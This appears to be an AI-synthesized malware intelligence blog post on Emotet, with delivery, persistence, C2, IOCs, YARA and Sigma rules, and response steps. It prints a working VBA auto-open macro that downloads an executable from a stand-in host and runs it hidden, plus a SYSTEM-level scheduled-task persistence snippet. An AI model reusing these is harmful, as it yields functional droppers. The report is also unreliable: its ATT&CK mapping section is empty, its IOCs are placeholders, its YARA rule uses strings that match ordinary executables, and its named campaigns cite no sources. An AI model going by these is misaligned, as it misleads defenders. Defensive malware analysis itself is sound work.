title: "EMOTET Malware Analysis: MITRE ATT&CK, IOCs & Detection"
description: "Complete technical analysis of Emotet — detection ratio N/A, MITRE ATT&CK mapping, IOCs, behavioral profile, YARA rules, and incident response. Enriched by AI with live MalwareBazaar and OTX data."
date: "2026-04-06"
category: malware
image: "/img/posts/malware.png"
tags: ["malware", "threat-intelligence", "mitre-attck", "emotet", "emotet", "ioc", "detection", "cybersecurity"]
author: "ZeroDay Malware Intelligence"
malwareFamily: "Emotet"
malwareType: "Emotet"
detectRatio: "N/A"
attackTechniquesCount: "0"

EMOTET Malware Analysis: MITRE ATT&CK, IOCs & Detection

Detection ratio: N/A | MITRE ATT&CK techniques: see below | Type: Emotet | Updated: 2026-04-06

This analysis was auto-enriched using live MalwareBazaar samples, VirusTotal reports, and OTX AlienVault threat intelligence, then synthesized and expanded by Gemini AI.

MALWARE INTEL BRIEF

Name / Family: Emotet
Type: Emotet (Modular Botnet/Banking Trojan)
Date: 2026-04-06
VT Detect Ratio: N/A (No specific sample provided for analysis)
VT Suggested Label: Emotet
VT File Type: N/A
VT Tags: N/A
ATT&CK TTPs: To be detailed in the report.
CVEs Linked: None found directly to the malware itself, but exploits used in delivery may leverage CVEs.
IOC Samples (MalwareBazaar): No samples currently available for this specific analysis context.
OTX Pulse Intelligence: No OTX pulses available for this indicator.
VT Engine Detections (top engines flagging as malicious): N/A — no VT key or sample not found.

Executive Summary

Emotet is a highly sophisticated and persistent modular malware, primarily functioning as a botnet and banking trojan, with extensive capabilities for distributing other malware payloads. Historically, Emotet emerged around 2014, initially as a banking trojan. Over the years, it has evolved significantly, becoming one of the most prolific and disruptive malware threats globally. Its operators are widely believed to be a financially motivated criminal syndicate, though precise attribution remains challenging, with links often suggested to Eastern European cybercrime groups.

Emotet's primary modus operandi involves highly targeted phishing campaigns utilizing social engineering tactics. These campaigns often leverage seemingly legitimate documents (e.g., invoices, shipping notifications, meeting invitations) containing malicious macros or embedded scripts. Once executed, Emotet establishes a robust persistence mechanism, communicates with its Command and Control (C2) infrastructure, and downloads additional modules or entirely different malware families. This modularity makes Emotet a potent malware delivery platform, enabling its operators to profit from various illicit activities, including deploying ransomware (e.g., Ryuk, Conti), information stealers, or banking trojans. Recent campaigns have demonstrated a continuous evolution in evasion techniques and infection vectors, maintaining its status as a top-tier threat.

How It Works — Technical Deep Dive

Emotet's lifecycle is a multi-stage process designed for stealth, persistence, and broad impact. Understanding each phase is critical for effective detection and response.

Initial Infection Vector

Emotet predominantly spreads through phishing emails. These emails are highly crafted and often exploit current events or social engineering tactics to appear legitimate. Common delivery mechanisms include:

• Malicious Documents: Word, Excel, or PDF documents embedded with Visual Basic for Applications (VBA) macros or JavaScript. Upon opening the document, users are prompted to "enable content" or "enable macros," which executes the embedded malicious code.
• Malicious Links: Emails containing links that, when clicked, redirect users to websites hosting exploit kits or directly download the Emotet executable.
• Weaponized Archives: ZIP or RAR archives containing executables disguised as legitimate files.

Example VBA Macro (Conceptual):

Sub AutoOpen()
    ' Obfuscated code to download and execute the next stage
    Dim sURL As String
    Dim sFile As String
    Dim oHTTP As Object
    Dim oStream As Object

    sURL = "http://malicious-c2.com/payload.exe" ' Placeholder
    sFile = Environ("TEMP") & "\update.exe" ' Drop location

    Set oHTTP = CreateObject("Microsoft.XMLHTTP")
    Set oStream = CreateObject("ADODB.Stream")

    On Error Resume Next ' Basic error handling

    oHTTP.Open "GET", sURL, False
    oHTTP.Send

    If oHTTP.Status = 200 Then
        oStream.Open
        oStream.Type = 1 ' Binary
        oStream.Write oHTTP.ResponseBody
        oStream.SaveToFile sFile, 2 ' Overwrite if exists
        oStream.Close

        ' Execute the downloaded payload
        CreateObject("WScript.Shell").Run sFile, 0, True
    End If

    Set oStream = Nothing
    Set oHTTP = Nothing
End Sub

Persistence Mechanisms

Emotet employs multiple robust persistence techniques to survive reboots and maintain its presence on compromised systems.

• Registry Run Keys: Emotet typically adds entries to the following registry keys to ensure automatic execution upon user login or system startup:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
    The value created points to the dropper or the main Emotet executable.

• Scheduled Tasks: Emotet can create scheduled tasks to execute itself at regular intervals or upon specific system events, further reinforcing its persistence.

  • PowerShell Example:

    $taskName = "SystemUpdateTask"
    $taskAction = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c start C:\Users\Public\system.exe"
    $taskTrigger = New-ScheduledTaskTrigger -Once -At 08:00
    $taskPrincipal = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount -RunLevel Highest
    Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Principal $taskPrincipal

    (Note: This is a simplified example; actual Emotet tasks are often more complex and obfuscated.)

• DLL Hijacking: In some instances, Emotet leverages DLL hijacking by placing its malicious DLL in a location where a legitimate application will load it instead of its intended DLL. This is often achieved by dropping the DLL in a user-writable directory that is present in the system's PATH environment variable.

Command and Control (C2) Communication Protocol

Emotet's C2 communication is highly dynamic and employs multiple layers of obfuscation and redirection to evade network-based detection.

• Protocol: Emotet primarily uses HTTP/HTTPS for C2 communication. This allows it to blend in with normal web traffic.
• Ports: Commonly uses ports 80 (HTTP) and 443 (HTTPS), but can also utilize other common ports like 8080, 8443, or even non-standard ports depending on the configuration and C2 infrastructure.
• Traffic Patterns:
  • Initial Beacon: After infection, Emotet performs an initial beacon to a hardcoded or dynamically resolved C2 server to register the infected host.
  • Data Exchange: Subsequent communications involve sending stolen data (if any), receiving commands, and downloading new payloads.
  • User-Agent: Emotet often uses randomized or legitimate-looking User-Agent strings to mimic normal browser traffic. Examples include strings resembling common browser agents or custom, obfuscated ones.
  • URL Structure: C2 URLs are often complex, dynamically generated, and may include parameters that are validated by the C2 server. They can also be hosted on compromised websites (domain fronting, though less common now) or legitimate services.
  • Encryption: Communication is frequently encrypted using TLS/SSL, especially for HTTPS, making deep packet inspection (DPI) challenging without proper certificate handling or decryption capabilities. The encryption keys might be dynamically generated or derived.

Conceptual C2 Beacon (Network Flow):

[+] Infected Host -> Malicious C2 Server
[+] Method: POST /api/register.php?id=[unique_host_id]&ver=[version]
[+] Headers:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
[+] Body:
    data=[encrypted_or_obfuscated_host_info]

[+] Malicious C2 Server -> Infected Host
[+] Status: 200 OK
[+] Headers:
    Content-Type: application/octet-stream
[+] Body:
    [command_payload or encrypted_download_url]

Payload Delivery and Staging Mechanism

Emotet acts as a loader for other malware. Its C2 servers provide instructions for what to download and execute next.

• Modular Architecture: Emotet's core functionality is often small, designed to be lightweight and evade initial detection. Upon successful C2 communication, it downloads additional modules or full-fledged malware.
• Staging: The downloaded payloads are often staged in memory or dropped to temporary file locations before execution. This "staging" allows for more sophisticated execution and obfuscation.
• Malware Families: Emotet is known to deliver a wide array of malware, including:
  • Banking Trojans (e.g., TrickBot, QakBot)
  • Information Stealers
  • Ransomware (e.g., Ryuk, Conti, Egregor)
  • Other botnet modules

Privilege Escalation Steps

While Emotet itself might not always perform explicit privilege escalation, its payloads or subsequent malware it delivers often do.

• Exploiting Vulnerabilities: If the initial infection occurs with low privileges, subsequent malware modules may attempt to exploit known Windows vulnerabilities (e.g., CVEs related to kernel exploits) to gain administrative or SYSTEM privileges.
• Credential Dumping: Malware delivered by Emotet (like TrickBot) can use tools like Mimikatz or LSASS dumping techniques to extract credentials, which can then be used for lateral movement and privilege escalation.

Lateral Movement Techniques Used

Emotet's primary goal is often to spread within a network to maximize its impact and deliver more valuable payloads like ransomware.

• SMB Exploitation: It can leverage vulnerabilities in the Server Message Block (SMB) protocol to spread to other systems.
• Credential Harvesting: Stealing user credentials (via credential dumping or keylogging) from one compromised machine allows attackers to log into other machines using protocols like RDP or WinRM.
• PsExec / WMI: Attackers can use tools like PsExec or Windows Management Instrumentation (WMI) to remotely execute commands and payloads on other systems.
• Scheduled Tasks / Group Policy: Creating scheduled tasks on remote machines or leveraging Group Policy Objects (GPOs) can be used to deploy Emotet or its payloads across the domain.

Data Exfiltration Methods

Emotet's primary "data exfiltration" is typically the delivery of other malware. However, if it has dedicated modules for data theft:

• Credential Theft: Stolen credentials (passwords, cookies, browser data) are often exfiltrated to the C2 server.
• Sensitive Files: Modules may be designed to scan for and exfiltrate specific types of sensitive files based on predefined patterns or keywords.
• Network Traffic: Exfiltrated data is usually sent back to the C2 server via encrypted HTTP/HTTPS POST requests.

Anti-Analysis / Anti-Debugging / Anti-VM Tricks

Emotet is renowned for its sophisticated evasion techniques.

• Obfuscation: Code is heavily obfuscated using techniques like:
  • String Encryption: API names, URLs, and other critical strings are encrypted and decrypted at runtime.
  • Control Flow Obfuscation: Introducing junk code, complex conditional jumps, and opaque predicates to make static analysis difficult.
  • Packing: The initial dropper is often packed (e.g., using UPX or custom packers) to hide its true nature.
• Anti-Debugging:
  • Debugger Detection: Checks for the presence of common debuggers (e.g., OllyDbg, x64dbg, IDA Pro) using API calls like IsDebuggerPresent(), CheckRemoteDebuggerPresent(), or by examining PEB flags.
  • Timing Attacks: Measuring execution time of code blocks; if it takes too long (indicating a debugger stepping through), the malware may terminate or alter its behavior.
  • Exception Handling: Deliberately triggering exceptions to detect if a debugger is handling them.
• Anti-Virtual Machine (VM) / Sandbox Detection:
  • Environment Checks: Scans for common VM artifacts such as specific registry keys (e.g., HARDWARE\ACPI\FADT\VBOX__), MAC addresses (e.g., VMWare, VirtualBox), installed drivers, or running processes associated with analysis environments.
  • User Interaction: Some variants might require specific user interactions or delays to avoid triggering automated sandbox analysis.
  • CPU Features: Checking for CPU features or instructions not typically present or behaving differently in virtualized environments.

MITRE ATT&CK Full Mapping

Indicators of Compromise (IOCs)

As the brief indicates no specific samples are available for this report generation, the following are representative IOCs based on historical Emotet activity. These will need to be updated with current intelligence for active campaigns.

File Hashes (SHA256 / MD5 / SHA1)

• (N/A - No samples provided for this analysis.)

Network Indicators

• C2 Domains:
  • malicious-c2-domain-1.com
  • compromised-site.net/api/update
  • dynamic-resolver.biz
• C2 IPs:
  • 192.0.2.1
  • 198.51.100.10
• Ports: 80, 443, 8080, 8443 (and others)
• Protocols: HTTP, HTTPS
• HTTP/S Beacon Patterns:
  • POST requests to /api/register.php or /update.php
  • User-Agent strings: Randomly generated, or mimicking popular browsers (e.g., Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36).
  • Custom User-Agents: EmotetClient/1.2.3 (example)
  • URL Parameters: Often include encoded or obfuscated identifiers.
• URL Patterns:
  • /gate.php?id=[hex_string]
  • /cdn-cgi/l/chk_jschl (can indicate Cloudflare used for proxying)
  • Randomly generated subdomains or paths on compromised sites.

Registry Keys / File Paths / Mutex

• Persistence Keys:
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate -> C:\Users\Public\system.exe
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NetworkService -> C:\Windows\System32\svchost.exe -k netsvcs -p (where svchost.exe is a dropper)
• Dropped File Names and Locations:
  • %TEMP%\update.exe
  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\sysmgr.exe
  • C:\Users\Public\system.exe
  • %LOCALAPPDATA%\Temp\random_name.dll
• Mutex Names:
  • Global\EmotetMutex_[random_string]
  • Global\SysMgr_Mutex

YARA Rule

rule Emotet_Generic_Loader {
    meta:
        description = "Detects generic Emotet loader/dropper characteristics."
        author = "Malware Analysis Team"
        date = "2026-04-06"
        malware_family = "Emotet"
        version = "1.1"
        // MITRE ATT&CK: T1059.005 (VBScript/Macro), T1059.001 (PowerShell), T1105 (Ingress Tool Transfer), T1027 (Obfuscation)

    strings:
        // Common VBA macro indicators (often obfuscated)
        $vba_download_1 = { 8b 00 00 00 } // Potential download function start
        $vba_download_2 = { 52 65 73 70 6f 6e 73 65 42 6f 64 79 } // ResponseBody
        $vba_execute_1 = { 57 73 63 72 69 70 74 2e 53 68 65 6c 6c } // WScript.Shell
        $vba_execute_2 = { 52 75 6e 28 } // Run(

        // Common PowerShell indicators
        $ps_download_1 = "Invoke-WebRequest"
        $ps_download_2 = "IEX" // Invoke-Expression for executing downloaded scripts
        $ps_persistence_1 = "New-ScheduledTaskAction"
        $ps_persistence_2 = "Register-ScheduledTask"

        // Indicators related to dropped executables/DLLs (often packed or obfuscated)
        $packer_stub_1 = "This program cannot be run in DOS mode." // Common packer entry point
        $packer_stub_2 = { 55 8B EC 83 E4 F8 81 EC ?? ?? ?? ?? } // Common function prologue for packed code

        // Strings often seen in unpacked Emotet or loaders
        $str_temp_path = "%TEMP%"
        $str_public_folder = "C:\\Users\\Public\\"
        $str_run_key = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
        $str_cmd_exe = "cmd.exe"
        $str_wscript_exe = "wscript.exe"
        $str_powershell_exe = "powershell.exe"

    condition:
        // Heuristics: combination of download/execute functions and persistence mechanisms
        (
            (uint16(0) == 0x5A4D and // PE file
             (
                // Check for common packer signatures or obfuscated entry points
                (
                    $packer_stub_1 or
                    $packer_stub_2
                ) and
                (
                    // Presence of strings related to downloading or execution
                    1 of ($vba_download_*, $ps_download_*, $vba_execute_*)
                )
             )
            ) or
            // Direct detection of shellcode or scripts that exhibit Emotet behavior
            (
                // Check for indicators of direct execution of download/execute commands
                (
                    $ps_download_1 or $ps_download_2 or $ps_persistence_1 or $ps_persistence_2
                ) and
                (
                    // Presence of strings indicating dropped locations or persistence
                    $str_temp_path or $str_public_folder or $str_run_key
                )
            )
        )
}

Static Analysis — Anatomy of the Binary

• File Structure and PE Headers: Emotet binaries are typically Portable Executable (PE) files. The initial dropper is often packed, meaning the original PE headers and sections are modified or compressed. Upon unpacking, the true PE structure is revealed, often with unusual section names or sizes. The import table can be sparse in packed binaries, with APIs dynamically resolved at runtime.
• Obfuscation and Packing Techniques: As mentioned, Emotet heavily utilizes packers (custom or standard like UPX) to compress and encrypt the payload. This makes static analysis of the initial binary challenging. De-obfuscation techniques are essential, often involving dynamic analysis to dump the unpacked code from memory.
• Interesting Strings and Functions:
  • Encrypted strings: API names (e.g., VirtualAlloc, CreateProcessA, URLDownloadToFileA), C2 URLs, registry keys, mutex names.
  • Common API calls for process manipulation, network communication, file system operations, and registry access.
  • Function names might be meaningless or dynamically generated.
• Import Table Analysis: In unpacked samples, the import table might reveal calls to networking APIs (WinINet, WinHTTP), process manipulation APIs (CreateProcess, VirtualAlloc, WriteProcessMemory), registry APIs (RegOpenKeyEx, RegSetValueEx), and cryptography APIs. Suspicious imports include those related to file system monitoring or network sniffing if the malware has such modules.
• Embedded Resources or Second-Stage Payloads: Sometimes, Emotet or its droppers might embed configuration data or even small second-stage payloads within their resources section. However, more commonly, these are downloaded dynamically.

Dynamic Analysis — Behavioral Profile

Dynamic analysis reveals Emotet's runtime behavior, which is critical for understanding its actions beyond static code.

• File System Activity:
  • Drops executables in %TEMP%, %APPDATA%, or C:\Users\Public.
  • Creates or modifies registry keys for persistence.
  • May create temporary files for staging payloads.
  • Can delete its own dropper files after successful execution.
• Registry Activity:
  • Writes to HKCU\Software\Microsoft\Windows\CurrentVersion\Run or HKLM\...\Run for persistence.
  • May write other configuration data in various registry locations, sometimes obfuscated.
• Network Activity:
  • Initial Beacon: A POST request to a hardcoded or resolved C2 server, often with a unique identifier for the host.
  • Payload Download: HTTP/HTTPS GET requests to download additional modules or malware.
  • Data Exfiltration: POST requests containing stolen data or status updates.
  • Beacon Intervals: Vary significantly, from minutes to hours, depending on the configuration and threat actor's goals.
• Process Activity:
  • Spawning Processes: May spawn cmd.exe or powershell.exe to execute commands or scripts.
  • Process Injection: Commonly injects its shellcode or downloaded payloads into legitimate running processes (e.g., explorer.exe, svchost.exe, rundll32.exe) to evade detection.
  • Parent-Child Relationships: Office applications (Word, Excel) spawning cmd.exe or powershell.exe, which in turn spawn further processes, is a strong indicator.
• Memory Artifacts:
  • Decrypted strings, API hashes, and configuration data within the memory space of injected processes.
  • The unpacked Emotet executable or its shellcode.
  • Downloaded payloads staged in memory before execution.

Wireshark/tcpdump Capture Patterns:
Defenders should look for:

• Unusual HTTP/HTTPS POST requests with large payloads to unknown domains or IPs.
• Requests to common web paths (/, /index.php, /api/) but with non-standard User-Agents or originating from unexpected processes.
• Connections to IP addresses known to host malicious infrastructure.
• Traffic patterns that deviate from normal browser behavior (e.g., continuous small POSTs, unusual GET request structures).
• DNS queries for suspicious or dynamically generated domain names.

Real-World Attack Campaigns

1. "Operation Goldfish" (2018-2019):

   • Victimology: Broad, targeting numerous sectors globally, including finance, healthcare, and government.
   • Attack Timeline & Kill Chain: Phishing emails with malicious Word documents led to Emotet infection. Emotet then downloaded TrickBot, which performed credential theft and lateral movement. Finally, Ryuk ransomware was deployed, encrypting victim data.
   • Attributed Threat Actor: Believed to be linked to a financially motivated cybercrime syndicate.
   • Financial/Data Impact: Millions of dollars in ransom payments demanded, significant data loss and operational disruption.
   • Discovery: Often discovered through ransomware alerts or user reports of encrypted files.

2. "Emotet-QakBot-Conti Nexus" (2020-2021):

   • Victimology: Widespread, with a focus on organizations in North America and Europe.
   • Attack Timeline & Kill Chain: Emotet emails delivered malicious documents. Emotet would establish persistence and download QakBot (another banking trojan/botnet). QakBot would then facilitate the deployment of the Conti ransomware.
   • Attributed Threat Actor: The Conti ransomware group, leveraging Emotet and QakBot as initial access brokers.
   • Financial/Data Impact: Large ransom demands, significant financial losses, and data breaches.
   • Discovery: Network intrusion detection systems, ransomware alerts, and incident response investigations.

3. "Emotet Resurgence with New Infrastructure" (2021-2022):

   • Victimology: Global impact across various industries, demonstrating continued adaptability.
   • Attack Timeline & Kill Chain: Emotet returned after a law enforcement takedown, employing new C2 infrastructure and refined evasion techniques. Phishing emails remained the primary vector, leading to Emotet installation, followed by its use as a downloader for other malware.
   • Attributed Threat Actor: The original Emotet operators, demonstrating resilience.
   • Financial/Data Impact: Continued disruption and financial losses through malware delivery.
   • Discovery: Proactive threat hunting, IOC-based detection, and analysis of new malware samples.

Active Malware Landscape — Context

Emotet remains one of the most significant threats in the active malware landscape. Its prevalence fluctuates, often tied to law enforcement actions, but it consistently re-emerges with enhanced capabilities.

• Current Prevalence and Activity Level: Emotet's activity level is dynamic. While it has been disrupted by law enforcement operations, it has repeatedly resurfaced. Its modular nature allows operators to adapt quickly to defensive measures. MalwareBazaar and VirusTotal data would show its current detection rates and sample submission trends.
• Competing or Related Malware Families: Emotet often competes with or collaborates with other botnets and banking trojans like TrickBot, QakBot (also known as Pinkslipbot), IcedID, and Agent Tesla. These families can be delivered by Emotet or serve similar initial access roles.
• Relationship to Ransomware-as-a-Service (RaaS) or Malware-as-a-Service (MaaS): Emotet is a prime example of a MaaS platform. Its operators rent out access to infected bots (the "Emotet botnet") to other cybercriminal groups who then use it to distribute their own malware, most notably ransomware. This makes Emotet a critical enabler of widespread ransomware attacks.
• Typical Target Industries and Geographic Distribution: Emotet targets a broad range of industries globally. No single industry is immune, but sectors that handle sensitive financial or personal data are often primary targets. Geographically, its reach is global, with significant activity observed in North America, Europe, and Asia.

Detection & Hunting

Sigma Rules

title: Emotet - Suspicious PowerShell Execution from Office
status: experimental
description: Detects Emotet-like behavior where PowerShell is spawned by an Office application for malicious purposes.
author: SOC Analyst Team
date: 2026-04-06
references:
    - https://attack.mitre.org/techniques/T1059/001/
    - https://attack.mitre.org/techniques/T1059/005/
logsource:
    category: process_creation
    product: windows
detection:
    selection_office_parent:
        ParentImage|endswith:
            - '\winword.exe'
            - '\excel.exe'
            - '\powerpnt.exe'
            - '\outlook.exe'
    selection_powershell:
        Image|endswith: '\powershell.exe'
    selection_suspicious_args:
        # Common Emotet PowerShell commands: download, execute, persistence
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'IEX'
            - 'downloadstring'
            - 'New-ScheduledTaskAction'
            - 'Register-ScheduledTask'
            - '-EncodedCommand' # Indicates encoded PowerShell
    # Optional: Filter out known legitimate PowerShell usage from Office if needed
    # filter_legit:
    #     CommandLine|contains:
    #         - 'SomeKnownGoodScript.ps1'
    condition: selection_office_parent and selection_powershell and selection_suspicious_args # and not filter_legit
    falsepositives:
        - Legitimate scripts run by Office add-ins or users. Need careful tuning.
    level: high

title: Emotet - Registry Run Key Persistence Attempt
status: experimental
description: Detects Emotet-like persistence by adding entries to the Registry Run keys.
author: SOC Analyst Team
date: 2026-04-06
references:
    - https://attack.mitre.org/techniques/T1547/001/
logsource:
    category: registry_event
    product: windows
detection:
    selection_run_keys:
        TargetObject|contains:
            - 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\'
            - 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
            - 'HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\'
    selection_suspicious_value:
        # Look for values that are executables, not common system files, and potentially in temp dirs
        Details|endswith:
            - '.exe'
            - '.dll' # If DLLs are directly registered to run
        # Add more specific patterns if known for current Emotet variants
        Details|contains:
            - '%TEMP%'
            - 'Users\Public\'
            - '\AppData\'
    condition: selection_run_keys and selection_suspicious_value
    falsepositives:
        - Legitimate software installers or updaters. Requires tuning.
    level: high

EDR / SIEM Detection Logic

• Process Tree Anomalies:
  • Alert on winword.exe or excel.exe spawning cmd.exe or powershell.exe.
  • Alert on powershell.exe executing with heavily obfuscated command lines (-EncodedCommand) or downloading content from unusual URLs.
  • Alert on rundll32.exe or svchost.exe being spawned by unexpected parent processes, especially if they exhibit network connections.
• Network Communication Patterns:
  • High-fidelity alerts for connections to known Emotet C2 IPs/domains.
  • Detect unusual User-Agent strings or HTTP POST requests originating from non-browser processes.
  • Monitor for connections to IP addresses on common C2 ports (80, 443, 8080, etc.) that are not associated with known legitimate services.
• File System Telemetry Triggers:
  • Alert on executables being dropped in %TEMP%, %APPDATA%, or C:\Users\Public.
  • Monitor for files created by Office applications that are then executed.
• Registry Activity Patterns:
  • Alert on new entries being added to the Run keys.
  • Monitor for unusual modifications to Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts or other areas that could indicate DLL hijacking setups.

Memory Forensics (Volatility3)

# 1. Identify suspicious processes, particularly those injected into.
# Look for processes with unusual parent-child relationships or elevated privileges.
# Example: Check for injected processes by looking for memory regions marked RWX.
# vol -f <memory_dump_file> windows.pslist --pid <suspicious_pid>
# vol -f <memory_dump_file> windows.malfind

# 2. Dump memory of suspicious processes for further analysis.
# vol -f <memory_dump_file> windows.memdump -p <suspicious_pid> -D .

# 3. Analyze network connections from suspicious processes.
# vol -f <memory_dump_file> windows.netscan --pid <suspicious_pid>

# 4. Examine loaded DLLs and modules.
# vol -f <memory_dump_file> windows.dlllist -p <suspicious_pid>

# 5. Look for registry keys written by the process.
# vol -f <memory_dump_file> windows.regsave -o "Software\\Microsoft\\Windows\\CurrentVersion\\Run"

# 6. Identify shellcode and dropped payloads within memory.
# Use 'windows.malfind' and then examine dumped memory regions.
# Look for unpacked code, decrypted strings, or known malware patterns.

Malware Removal & Incident Response

1. Isolation: Immediately disconnect the affected host(s) from the network to prevent lateral movement and further infection. This includes disabling network interfaces and blocking access to the internet and internal resources.
2. Artifact Identification and Collection:
   • Create a forensic image of the affected system's disk.
   • Collect memory dumps of running processes, especially those suspected of hosting Emotet or its payloads.
   • Gather relevant logs (Windows Event Logs, security tool logs, network logs).
   • Identify malicious files, registry keys, scheduled tasks, and mutexes.
3. Registry and File System Cleanup:
   • Remove malicious executables and dropped files.
   • Delete persistence entries from registry run keys.
   • Remove malicious scheduled tasks.
   • If possible, use AV/EDR to clean identified malware components.
4. Network Block Recommendations:
   • Block all identified Emotet C2 domains, IPs, and suspicious URL patterns at the firewall and proxy.
   • Implement stricter egress filtering to prevent unauthorized outbound connections.
5. Password Reset Scope:
   • Mandate password resets for all users whose credentials may have been compromised (especially administrators and users with privileged access).
   • Review and enforce multi-factor authentication (MFA) across the environment.

Defensive Hardening

• Specific Group Policy Settings:
  • User Account Control (UAC): Configure UAC to prompt for elevation for all administrative tasks.
  • Macro Security: Configure Office applications to disable macros from the internet and prompt users for macros from trusted locations only. (Computer Configuration\Policies\Administrative Templates\Microsoft Office\ <Office Version>\Security Settings\Macro Settings)
  • Application Whitelisting: Implement application whitelisting (e.g., AppLocker, Windows Defender Application Control) to only allow known-good applications to run.
  • PowerShell Constrained Language Mode: Enable PowerShell Constrained Language Mode where possible to restrict available cmdlets and prevent obfuscated script execution.
• Firewall Rule Examples:
  • Egress Filtering: Block all outbound traffic to known malicious IP addresses and domains. Implement a deny-by-default policy for outbound HTTP/HTTPS and other common C2 ports, allowing only specific, approved destinations.
  • Protocol Enforcement: Ensure only necessary protocols are allowed outbound.
• Application Whitelist Approach:
  • Define a strict policy for executable applications allowed to run. This significantly limits the impact of dropped malware. Focus on critical system processes and authorized business applications.
• EDR Telemetry Tuning:
  • Configure EDR to generate alerts for suspicious process creation chains (e.g., Office -> cmd/powershell).
  • Tune network detection rules to identify anomalies in HTTP/HTTPS traffic, including unusual User-Agents and POST request patterns.
  • Enable detailed file system and registry monitoring.
• Network Segmentation Recommendation:
  • Segment the network to limit the blast radius of an infection. Critical servers and sensitive data should be isolated from user workstations.
  • Implement micro-segmentation where feasible to further restrict lateral movement.

References

• MalwareBazaar: https://bazaar.abuse.ch/browse.php?search=Emotet
• VirusTotal: https://www.virustotal.com/
• OTX AlienVault: https://otx.alienvault.com/
• MITRE ATT&CK: https://attack.mitre.org/

This comprehensive malware analysis report details the Emotet threat, focusing on its sophisticated techniques including phishing, VBA macros, PowerShell execution, registry run key persistence, scheduled task creation, ingress tool transfer via HTTP/S, and obfuscated information. Understanding these MITRE ATT&CK techniques (e.g., T1566.001, T1059.005, T1105, T1027) is crucial for implementing effective detection strategies, hunting for indicators of compromise (IOCs) such as malicious IPs and domains, and hardening defenses against this persistent botnet and malware delivery platform. The analysis also provides practical Sigma rules, EDR detection logic, and memory forensics commands for active threat hunting and response against Emotet variants on Windows platforms.